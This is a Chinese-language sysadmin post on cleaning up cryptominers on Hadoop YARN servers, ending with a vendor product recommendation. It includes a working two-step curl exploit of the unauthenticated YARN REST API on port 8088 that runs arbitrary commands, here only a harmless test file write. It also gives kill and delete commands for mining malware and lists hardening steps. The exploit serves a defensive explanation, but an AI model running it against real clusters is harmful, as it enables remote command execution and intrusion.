伺服器被挖礦後如何處理
挖礦會使伺服器硬體資源,如:CPU、記憶體消耗極大,但是一般運維人員處理挖礦攻擊時最頭疼的就是處理不乾淨,其實挖礦攻擊能夠成功主要方式是通過伺服器安裝的第三方工具內在的對外RestAPI進行的,這些第三方工具如果API存在漏洞就會很大程度被黑客攻擊利用開放的埠進行攻擊
攻擊步驟:
1.申請新的application
直接通過curl進行POST請求
curl -v -X POST 'http://ip:8088/ws/v1/cluster/apps/new-application'
返回內容類似於:
{"application-id":"application_1527144634877_20465","maximum-resource-capability":{"memory":16384,"vCores":8}}
2.構造並提交任務
構造json檔案1.json,內容如下,其中application-id對應上面得到的id,命令內容為嘗試在/var/tmp目錄下建立11112222_test_111122222
檔案,內容也為111:
-
{
-
"am-container-spec":{
-
"commands":{
-
"command":"echo '111' > /var/tmp/11112222_test_11112222"
-
}
-
},
-
"application-id":"application_1527144634877_20465",
-
"application-name":"test",
-
"application-type":"YARN"
-
}
然後直接
curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' http://ip:8088/ws/v1/cluster/apps --data-binary @1.json
即可完成攻擊,命令被執行,在相應目錄下可以看到生成了對應檔案
處理方式:
-
1.pkill -f cryptonight
-
2.pkill -f sustes
-
3.pkill -f xmrig
-
4.pkill -f xmr-stak
-
5.pkill -f suppoie
-
6.ps ax | grep "config.json -t" | grep -v grep | awk '{print $1}' | xargs kill -9
-
7.ps ax | grep 'wc.conf\|wq.conf\|wm.conf\|wt.conf' | grep -v grep | grep 'ppl\|pscf\|ppc\|ppp' | awk '{print $1}' | xargs kill -9
-
8.rm -rf /var/tmp/pscf*
-
9.rm -rf /tmp/pscf*
清理病毒
- 使用top檢視程序,kill掉異常程序
- 檢查/tmp和/var/tmp目錄,刪除java、ppc、w.conf等異常檔案
- 檢查crontab任務列表,刪除異常任務
- 排查YARN日誌,確認異常的application,刪除處理
安全加固
- 通過iptables或者安全組配置訪問策略,限制對8088等埠的訪問
- 如無必要,不要將介面開放在公網,改為本地或者內網呼叫
- 升級Hadoop到2.x版本以上,並啟用Kerberos認證功能,禁止匿名訪問
- 雲鏡當前已支援該漏洞檢測,同時也支援挖礦木馬的發現,建議安裝雲鏡並開通專業版,及時發現漏洞並修復或者在中馬後能及時收到提醒進行止損
最後檢視/var/spool/cron/crontabs/root 定時任務是否被串改